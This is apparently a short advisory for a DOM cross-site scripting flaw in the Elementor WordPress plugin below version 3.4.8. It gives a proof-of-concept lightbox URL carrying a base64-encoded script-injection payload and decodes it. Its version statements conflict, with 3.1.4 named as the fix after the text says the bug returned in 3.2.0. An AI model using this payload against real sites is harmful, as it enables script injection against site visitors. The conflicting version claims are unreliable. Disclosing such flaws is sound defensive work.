Elementor < 3.4.8 – DOM Cross-Site-Scripting

The plugin does not sanitise or escape user input appended to the DOM via a malicious hash, resulting in a DOM Cross-Site Scripting issue.

The issue was initially fixed in 3.1.4, however re-introduced in 3.2.0.

https://example.com/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9 

The base64 string is an encoded JSON with the following structure:

{
	"type":"null",
	"html":"<script>alert('xss')</script>"
}

This vulnerability has been fixed in the version 3.1.4. If you are using elementor to build your site, I would recommend you to upgrade to the last version.

To fix the vulnerability, the developer team have removed the “default case” in the switch (line 165).

Reference:

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *